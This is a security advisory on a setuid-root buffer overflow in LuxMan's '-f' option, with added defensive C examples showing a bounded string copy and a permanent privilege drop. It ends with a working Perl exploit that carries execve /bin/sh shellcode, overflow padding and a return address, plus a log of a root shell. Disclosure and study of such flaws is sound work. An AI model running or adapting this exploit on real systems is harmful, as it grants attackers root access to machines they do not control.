LuxMan '-f' Option Buffer Overflow
Summary
LuxMan is "a Pac-Man clone for SVGALIB. It includes color, sound, several different levels, and difficulty settings".
Providing an overly long argument to LuxMan's '-f' option overflows a fixed-size buffer; if the program is installed setuid, this can be leveraged to gain elevated privileges.
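The following is an added example, not LuxMan's source: it places the pattern the advisory describes (an option value copied into a fixed-size buffer with no length check) next to a bounded version that rejects anything that does not fit. The buffer size FRAME_FILE_MAX, the function names and the sample arguments are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the '-f' value; LuxMan's real size is not on the page. */
#define FRAME_FILE_MAX 256

/* Vulnerable pattern: strcpy() does not know how large the destination is,
 * so an argv value longer than the buffer keeps writing past its end. */
void set_frame_file_unsafe(char *frame_file, const char *arg)
{
    strcpy(frame_file, arg);
}

/* Hardened version: measure the input against the buffer first, reserve room
 * for the terminating NUL, and never write past the end.
 * Returns 0 on success, -1 if the argument is too long. */
int set_frame_file_safe(char *frame_file, size_t frame_file_len, const char *arg)
{
    size_t n = 0;
    while (n < frame_file_len && arg[n] != '\0')   /* bounded scan */
        n++;
    if (n >= frame_file_len)
        return -1;                                  /* no room for the NUL */
    memcpy(frame_file, arg, n + 1);                 /* n bytes plus the NUL */
    return 0;
}

/* Constructed input: an argument of the same length as the advisory's padding
 * (8732 bytes). The bounded copy must reject it; returns -1. */
int demo_reject_oversized(void)
{
    static char arg[8732 + 1];
    char frame_file[FRAME_FILE_MAX];
    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    return set_frame_file_safe(frame_file, sizeof frame_file, arg);
}

/* A normal-looking argument is accepted and copied intact; returns 1 on success. */
int demo_accept_normal(void)
{
    char frame_file[FRAME_FILE_MAX];
    if (set_frame_file_safe(frame_file, sizeof frame_file, "level1.map") != 0)
        return 0;
    return strcmp(frame_file, "level1.map") == 0;
}

/* Boundary check: FRAME_FILE_MAX - 1 characters fit (with the NUL),
 * FRAME_FILE_MAX characters do not. Returns 1 if both hold. */
int demo_boundary(void)
{
    char frame_file[FRAME_FILE_MAX];
    char exact[FRAME_FILE_MAX + 1];
    memset(exact, 'B', sizeof exact - 1);
    exact[sizeof exact - 1] = '\0';
    exact[FRAME_FILE_MAX - 1] = '\0';       /* FRAME_FILE_MAX - 1 characters */
    if (set_frame_file_safe(frame_file, sizeof frame_file, exact) != 0)
        return 0;
    exact[FRAME_FILE_MAX - 1] = 'B';        /* FRAME_FILE_MAX characters */
    if (set_frame_file_safe(frame_file, sizeof frame_file, exact) != -1)
        return 0;
    return 1;
}

int main(void)
{
    printf("oversized rejected: %d\n", demo_reject_oversized() == -1);
    printf("normal accepted:    %d\n", demo_accept_normal());
    printf("boundary correct:   %d\n", demo_boundary());
    return 0;
}
```

The bounded scan stops at the buffer length, so a multi-kilobyte argument costs no more than a legitimate one to reject, and the off-by-one at the NUL is handled by comparing against the full buffer length rather than length minus one.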
Credit:
The information has been provided by Kevin Finisterre.
The original article can be found at: http://www.digitalmunition.com/DMA%5B2005-0310a%5D.txt
Details
Vulnerable Systems:
* LuxMan Debian stable 0.41-17.1 and prior
* LuxMan Debian unstable 0.41-19 and prior
Immune Systems:
* LuxMan Debian stable 0.41-17.2
* LuxMan Debian unstable 0.41-20
LuxMan, like all other programs which use "svgalib", runs setuid-root. This means that it can perform any action on your system with the power of the root user.
The very first thing the program does (after printing a copyright notice) is to call vga_init(). "vga_init()" is an svgalib routine which initializes the VGA card and gives up root privileges.
LuxMan never attempts to regain root privileges after this point.
The author did a good job of limiting the impact of this bug. The early call to vga_init() pretty much curbs it: vga_init() detects the chip-set and gives up supervisor rights immediately.
Attackers wishing to exploit this bug have only two options: hope that the machine is running an old-school version of svgalib, or look for 'security compat' in the configuration file. Without either of these, they pretty much have to find some other technique for bypassing vga_init().
Svgalib versions prior to 1.2.11 had a security hole whereby it was possible to regain root privileges even after a vga_init() call. Some programs may (accidentally) rely on the old vga_init() behavior, which was probably due to the author not knowing about saved uids (which may not even have existed in Linux at that time). Because of this, svgalib includes an option to revert to the old behavior: placing 'security compat' in /etc/vga/libvga.conf (on Debian, /etc/vga/libvga.config) reinstates it.
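The saved-uid point above is what separates a temporary privilege drop from a permanent one. The following is an added example, not svgalib's vga_init(): it drops privileges by setting the real, effective and saved IDs together, then verifies that root cannot be regained. The function names and the fallback target uid/gid 65534 (conventionally "nobody") are assumptions; when run unprivileged it drops to the caller's own IDs so it can be executed without root.

```c
#define _GNU_SOURCE            /* setresuid()/getresuid() are GNU/Linux extensions */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Prototypes repeated in case <unistd.h> was already pulled in without
 * _GNU_SOURCE in effect; they match glibc's declarations. */
extern int setresuid(uid_t ruid, uid_t euid, uid_t suid);
extern int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
extern int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);

/* The check a setuid program should make after dropping privileges:
 * returns 1 if any of the real, effective or saved UIDs is still 0,
 * 0 if none is, -1 on error. A seteuid()-only drop (the pre-1.2.11
 * svgalib behaviour) leaves the saved UID at 0 and fails this check. */
int root_still_reachable(void)
{
    uid_t ruid, euid, suid;
    if (getresuid(&ruid, &euid, &suid) != 0)
        return -1;
    return (ruid == 0 || euid == 0 || suid == 0) ? 1 : 0;
}

/* Permanent drop to (uid, gid). Order matters: supplementary groups and the
 * GID triple are changed while still root, because changing the UID first
 * would remove the right to change groups. The drop is then verified by
 * confirming that an attempt to return to root is refused.
 * Returns 0 on success, -1 on failure. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && getgroups(0, NULL) > 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    /* Verification step: must fail with EPERM once the saved UID is gone. */
    if (uid != 0 && setresuid(0, 0, 0) == 0)
        return -1;
    return root_still_reachable() == 0 ? 0 : -1;
}

/* Demo target: the caller's own IDs when already unprivileged, otherwise
 * 65534 (assumed to be "nobody"; adjust for the local system). */
uid_t demo_target_uid(void) { return getuid() != 0 ? getuid() : (uid_t)65534; }
gid_t demo_target_gid(void) { return getgid() != 0 ? getgid() : (gid_t)65534; }

int main(void)
{
    if (drop_privileges_permanently(demo_target_uid(), demo_target_gid()) != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("root still reachable after drop: %d\n", root_still_reachable());
    return 0;
}
```

The verification step is the part most drop-privilege code omits: it is cheap, and it turns the "security compat" situation described above into an immediate, detectable failure instead of a silently reachable root.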
Vendor Status:
The vendor has fixed the problem: http://www.debian.org/security/2005/dsa-693
Exploit:
#!/usr/bin/perl -w
#
# luxman exploit
#
# ii luxman 0.41-19.1 Pac-Man clone (svgalib based)
#
# Tested with "security compat" set in /etc/vga/libvga.config on debian unstable 3.1
#
# kfinisterre@jdam:~$ ./luxman_ex.pl
# LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
# LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.
#
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# Using SIS driver, 2048KB. Chiptype=8
# svgalib 1.4.3
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# svgalib: Failed to initialize mouse.
#
# The frame rate is now set to 1 frames per second.
# If the game seems too fast, too slow, or too jerky,
# you can adjust this value the `-r' option.
#
# Calibrating delay...-664257
# Sound server started [pid:7082]
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)
#
($offset) = @ARGV,$offset || ($offset = 0);
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$ENV{"FOO"} = $sc;
$buf = "A" x 8732;
$buf .= (pack("l",(0xbfffffff-512+$offset)) x2);
#exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf");
exec("/usr/games/luxman -r 1 -f $buf");